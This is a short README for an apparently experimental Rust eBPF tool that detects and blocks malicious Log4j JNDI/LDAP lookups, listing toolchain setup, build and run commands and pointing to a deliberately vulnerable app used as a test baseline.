extended Log4j observability tool used to detect and prevent malicious JNDI (/LDAP) lookups. Currently tested in a controlled environment.
- Developed with aya (https://github.com/aya-rs/aya) a Rust eBPF library.
- Use in tandem with https://github.com/christophetd/log4shell-vulnerable-app (baseline).
Rust stable and nightly toolchain:
rustup install stable
rustup toolchain install nightly --component rust-src
bpf-linker:
cargo install bpf-linker
Ref: https://aya-rs.dev/book/start/development/#how-to-use-this-guide
cargo build
cargo xtask build-ebpf
Default config: draft-rule-set-default.yml
cat logger-info/src/draft-rule-set-v1.yml
cargo xtask run
RUST_LOG=info cargo xtask run